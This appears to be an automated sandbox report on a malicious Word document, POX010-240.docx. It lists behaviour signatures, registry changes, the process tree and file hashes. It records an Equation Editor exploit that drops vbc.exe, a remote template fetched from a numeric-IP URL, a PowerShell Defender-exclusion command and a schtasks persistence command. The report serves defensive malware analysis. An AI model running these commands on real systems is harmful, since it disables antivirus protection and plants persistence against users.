Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
101s -
max time network
104s -
platform
windows7_x64 -
resource
win7-20230220-en -
resource tags
arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system -
submitted
02/03/2023, 14:17
Static task
static1
Behavioral task
behavioral1
Sample
POX010-240.docx
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
POX010-240.docx
Resource
win10v2004-20230220-en
General
-
Target
POX010-240.docx
-
Size
10KB
-
MD5
84b25af93d91ad40962a0db9403cc644
-
SHA1
d38e907dfbe22b0e0eb7ab7ae8515eb69a7dddbc
-
SHA256
da53bd57af58ae908cd30e303113930cecbd995719404e2dbd7009f0bc54926d
-
SHA512
ff3b085bde3ccff0592453ded391daac66819d5c8ad3035cb7c567891528ceb0c014c3265f8735cfa780de5d06c746a24f2d1504d669fbd17660f42ab855437c
-
SSDEEP
192:ScIMmtP1aIG/bslPL++uOw4Nl+CVWBXJC0c3qe:SPXU/slT+LOw6HkZC9h
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 7 552 EQNEDT32.EXE -
Downloads MZ/PE file
-
Abuses OpenXML format to download file from external location 2 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1283023626-844874658-3193756055-1000\Software\Microsoft\Office\14.0\Common WINWORD.EXE Key opened \REGISTRY\USER\S-1-5-21-1283023626-844874658-3193756055-1000\Software\Microsoft\Office\Common\Offline\Files\http://3324948138/bg...................................doc WINWORD.EXE -
Executes dropped EXE 6 IoCs
pid Process 756 vbc.exe 1724 vbc.exe 1580 vbc.exe 1748 vbc.exe 1504 vbc.exe 1280 vbc.exe -
Loads dropped DLL 2 IoCs
pid Process 552 EQNEDT32.EXE 552 EQNEDT32.EXE -
Uses the VBS compiler for execution 1 TTPs
-
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Office loads VBA resources, possible macro or embedded object present
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 916 schtasks.exe -
Launches Equation Editor 1 TTPs 1 IoCs
Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.
pid Process 552 EQNEDT32.EXE -
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1283023626-844874658-3193756055-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1283023626-844874658-3193756055-1000\Software\Microsoft\Internet Explorer\MenuExt WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1283023626-844874658-3193756055-1000\Software\Microsoft\Internet Explorer\Toolbar WINWORD.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1283023626-844874658-3193756055-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1283023626-844874658-3193756055-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1283023626-844874658-3193756055-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1283023626-844874658-3193756055-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit" WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell WINWORD.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1283023626-844874658-3193756055-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1283023626-844874658-3193756055-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND WINWORD.EXE -
Modifies registry class 64 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\ = "[open(\"%1\")]" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\ = "&Open" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ = "&Open" WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\application WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\ = "&Print" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application\ = "Excel" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ = "&Open" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application\ = "Excel" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic\ = "system" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\application WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\ = "[open(\"%1\")]" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shellex\IconHandler WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\ = "&Open" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\ = "&Open" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\ = "&Open" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000 WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\application\ = "Excel" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000 WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000 WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shellex\IconHandler\ = "{42042206-2D85-11D3-8CFF-005004838597}" WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\topic WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\topic WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shellex\IconHandler WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic\ = "system" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32\ThreadingModel = "Apartment" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\topic\ = "system" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597} WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ = "&Open" WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 1768 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 12 IoCs
pid Process 756 vbc.exe 756 vbc.exe 756 vbc.exe 756 vbc.exe 756 vbc.exe 756 vbc.exe 756 vbc.exe 756 vbc.exe 756 vbc.exe 756 vbc.exe 756 vbc.exe 904 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 756 vbc.exe Token: SeDebugPrivilege 904 powershell.exe Token: SeShutdownPrivilege 1768 WINWORD.EXE -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 1768 WINWORD.EXE 1768 WINWORD.EXE -
Suspicious use of WriteProcessMemory 36 IoCs
description pid Process procid_target PID 552 wrote to memory of 756 552 EQNEDT32.EXE 31 PID 552 wrote to memory of 756 552 EQNEDT32.EXE 31 PID 552 wrote to memory of 756 552 EQNEDT32.EXE 31 PID 552 wrote to memory of 756 552 EQNEDT32.EXE 31 PID 1768 wrote to memory of 844 1768 WINWORD.EXE 33 PID 1768 wrote to memory of 844 1768 WINWORD.EXE 33 PID 1768 wrote to memory of 844 1768 WINWORD.EXE 33 PID 1768 wrote to memory of 844 1768 WINWORD.EXE 33 PID 756 wrote to memory of 904 756 vbc.exe 35 PID 756 wrote to memory of 904 756 vbc.exe 35 PID 756 wrote to memory of 904 756 vbc.exe 35 PID 756 wrote to memory of 904 756 vbc.exe 35 PID 756 wrote to memory of 916 756 vbc.exe 37 PID 756 wrote to memory of 916 756 vbc.exe 37 PID 756 wrote to memory of 916 756 vbc.exe 37 PID 756 wrote to memory of 916 756 vbc.exe 37 PID 756 wrote to memory of 1724 756 vbc.exe 39 PID 756 wrote to memory of 1724 756 vbc.exe 39 PID 756 wrote to memory of 1724 756 vbc.exe 39 PID 756 wrote to memory of 1724 756 vbc.exe 39 PID 756 wrote to memory of 1580 756 vbc.exe 40 PID 756 wrote to memory of 1580 756 vbc.exe 40 PID 756 wrote to memory of 1580 756 vbc.exe 40 PID 756 wrote to memory of 1580 756 vbc.exe 40 PID 756 wrote to memory of 1748 756 vbc.exe 41 PID 756 wrote to memory of 1748 756 vbc.exe 41 PID 756 wrote to memory of 1748 756 vbc.exe 41 PID 756 wrote to memory of 1748 756 vbc.exe 41 PID 756 wrote to memory of 1504 756 vbc.exe 42 PID 756 wrote to memory of 1504 756 vbc.exe 42 PID 756 wrote to memory of 1504 756 vbc.exe 42 PID 756 wrote to memory of 1504 756 vbc.exe 42 PID 756 wrote to memory of 1280 756 vbc.exe 43 PID 756 wrote to memory of 1280 756 vbc.exe 43 PID 756 wrote to memory of 1280 756 vbc.exe 43 PID 756 wrote to memory of 1280 756 vbc.exe 43
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\POX010-240.docx"1⤵
- Abuses OpenXML format to download file from external location
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1768 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵PID:844
-
-
C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding1⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
PID:552 -
C:\Users\Public\vbc.exe"C:\Users\Public\vbc.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:756 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\iioqULceCJUGWS.exe"3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:904
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iioqULceCJUGWS" /XML "C:\Users\Admin\AppData\Local\Temp\tmpFF9.tmp"3⤵
- Creates scheduled task(s)
PID:916
-
-
C:\Users\Public\vbc.exe"C:\Users\Public\vbc.exe"3⤵
- Executes dropped EXE
PID:1724
-
-
C:\Users\Public\vbc.exe"C:\Users\Public\vbc.exe"3⤵
- Executes dropped EXE
PID:1580
-
-
C:\Users\Public\vbc.exe"C:\Users\Public\vbc.exe"3⤵
- Executes dropped EXE
PID:1748
-
-
C:\Users\Public\vbc.exe"C:\Users\Public\vbc.exe"3⤵
- Executes dropped EXE
PID:1504
-
-
C:\Users\Public\vbc.exe"C:\Users\Public\vbc.exe"3⤵
- Executes dropped EXE
PID:1280
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{28E8A8AF-8DFD-40F0-BE31-90032A989923}.FSD
Filesize128KB
MD5c50134d4422876a78d214167c4c50ce4
SHA185b7cb7ba9c23baa5b079dae81b1b9aed03b21fa
SHA2567a0eb37d6fdd94b64a64ad7ccdc7fbb77aff0fa6fee37caf86a7eae6d209d8dd
SHA512841618abdc9f764f12d6cfb50cf501eb1f6c97ac9dad69695984bfebcc6ff110b979e5943f85aba9dfddc818115792937f776154a1e2ed9f7e406ad33b5ebfe1
-
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD
Filesize128KB
MD5b638a146c5fac41943f2100cb366de35
SHA14e50800e6e975b5c46e76d8ac11334be390575ab
SHA256d3024abfe47cd8065e5c0f0dc6f799aa56b0f36ef2e1714e9566325a862f3744
SHA512793772ae56bd75f9b8d7013a9aad4417dd98898d5d343f541ca6f4c5314e0032b65b516683f607daf958f988d4844395c57087ce678371ea319eb5eadd7ef4f8
-
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{E4E51ABD-4F40-43E5-AE61-978A45D88771}.FSD
Filesize128KB
MD5563bc5fa0e15c0a1ab39da7919040a4e
SHA176c18b360c7574e3b649f17d1155b4e5b976d231
SHA2564e9e33c971fb5f301792c8747653a605124740f323f0752c12639dfd68e80fd3
SHA51290b160e94075ebcb8d3d9d1cd6f871e16e38133c6e635160233eb625db9ed82f9b731c818f9a9630a63937ec99a7c3d7467b0dd279f80e432dfa88d9a34537b3
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\TOS3MI7U\bg[1].doc
Filesize12KB
MD5ba628c629f3472e3b57de14e3cdb05d2
SHA1b492c03cb6824682d575a6b77e3c1c3b7755a331
SHA256e399cdab404d5046aba55ff32346f96349d482763a3b1c633c9a8fb594f09a17
SHA51241fd46f514437a823eef56dd83adf3e8e2f7270ca1a24734a3f639ba3f82db55c170d5056854832602d65e75f2d5772847fbd18e8f9531fc406e8aa62db63cfb
-
Filesize
1KB
MD579798868e411b13e70ea6997052e9593
SHA1f838bf07cde2b69cefefc57854bf5fd5d429fbd1
SHA256b630e4415962b609bedf2ae6737dcd42d211bc6c47063236dba6648ab9b7ed43
SHA512c7dba5b354c48f42ee749d1f8c70f146223335609a9286d33786f27d10a509f401c9c4a35467dd13eec598cccd3136ed26d7e297b98fecc79215b70abe8ed115
-
Filesize
128KB
MD526a8877f5dcd902e8e614d253fe0624d
SHA184ca48720fd213a0b6950562e900148a331903ec
SHA25649f915f6f137bd59eeb4537e1c45cd16fec5ddf2c2dce3fbe04993f976d3dca1
SHA512cb021c106dea01bb3a294ea4b17bcaee66b8e971a04f40679a4fa88b8b413ffa0b0575391e6e0df510cc0ddd80234285e31b9c334400c0f0741d58adec8290cc
-
Filesize
84B
MD5f6ba86c4321311e89c822975458c513a
SHA1ad6a18c6038975d70e80a0f9a1a3492b8d2c3a30
SHA2564cead7ce9aa7aaa1b5084b59ce763044784de135a7415ac01f8e694654d2c79f
SHA512ac234cb8afa6e31cb20f6362c80d08bc50279bd9edfff859836b1be8481117b36c8b6befb6c83b1c60e51ea73449eac4b7f2e246066ae2e3f9cb8406707dcb1f
-
Filesize
20KB
MD5ad2222f39399510ad91576f67f54e42b
SHA11aea4fddf5b606ff4765d8048d0a045deaf04128
SHA256f15f8847aa5acb64d775e2fb79fec9c1482ca1d01922e22c38daa34ee1c5c258
SHA51223e4fe9bca3f8d7e41af61f2cd8e84bf97dda34221da244d77e508b870df31d7d9dfdbaa65cc73816e2f1bf37a003eeaea08b35ce3a65084a1d0d954528d7079
-
Filesize
1.3MB
MD5fbaac522046f0b2c2ded0ba88585f68a
SHA170f050f44b83c47a41e94de0fd5e88a4f3ba4cf2
SHA25685d72481b46dae1f11917c668a2dcb054fd1d72109c90110d5509060c5f1f7e8
SHA5124ea98ae5c04c5b2e888b4adfc4cf228b8cb634789d65ea3e6721932375252edc3f9c80ed6dda76fef0142bcd25ad5dacebb8272d2ba6ff69f9af68ee82a31046
-
Filesize
1.3MB
MD5fbaac522046f0b2c2ded0ba88585f68a
SHA170f050f44b83c47a41e94de0fd5e88a4f3ba4cf2
SHA25685d72481b46dae1f11917c668a2dcb054fd1d72109c90110d5509060c5f1f7e8
SHA5124ea98ae5c04c5b2e888b4adfc4cf228b8cb634789d65ea3e6721932375252edc3f9c80ed6dda76fef0142bcd25ad5dacebb8272d2ba6ff69f9af68ee82a31046
-
Filesize
1.3MB
MD5fbaac522046f0b2c2ded0ba88585f68a
SHA170f050f44b83c47a41e94de0fd5e88a4f3ba4cf2
SHA25685d72481b46dae1f11917c668a2dcb054fd1d72109c90110d5509060c5f1f7e8
SHA5124ea98ae5c04c5b2e888b4adfc4cf228b8cb634789d65ea3e6721932375252edc3f9c80ed6dda76fef0142bcd25ad5dacebb8272d2ba6ff69f9af68ee82a31046
-
Filesize
1.3MB
MD5fbaac522046f0b2c2ded0ba88585f68a
SHA170f050f44b83c47a41e94de0fd5e88a4f3ba4cf2
SHA25685d72481b46dae1f11917c668a2dcb054fd1d72109c90110d5509060c5f1f7e8
SHA5124ea98ae5c04c5b2e888b4adfc4cf228b8cb634789d65ea3e6721932375252edc3f9c80ed6dda76fef0142bcd25ad5dacebb8272d2ba6ff69f9af68ee82a31046
-
Filesize
1.3MB
MD5fbaac522046f0b2c2ded0ba88585f68a
SHA170f050f44b83c47a41e94de0fd5e88a4f3ba4cf2
SHA25685d72481b46dae1f11917c668a2dcb054fd1d72109c90110d5509060c5f1f7e8
SHA5124ea98ae5c04c5b2e888b4adfc4cf228b8cb634789d65ea3e6721932375252edc3f9c80ed6dda76fef0142bcd25ad5dacebb8272d2ba6ff69f9af68ee82a31046
-
Filesize
1.3MB
MD5fbaac522046f0b2c2ded0ba88585f68a
SHA170f050f44b83c47a41e94de0fd5e88a4f3ba4cf2
SHA25685d72481b46dae1f11917c668a2dcb054fd1d72109c90110d5509060c5f1f7e8
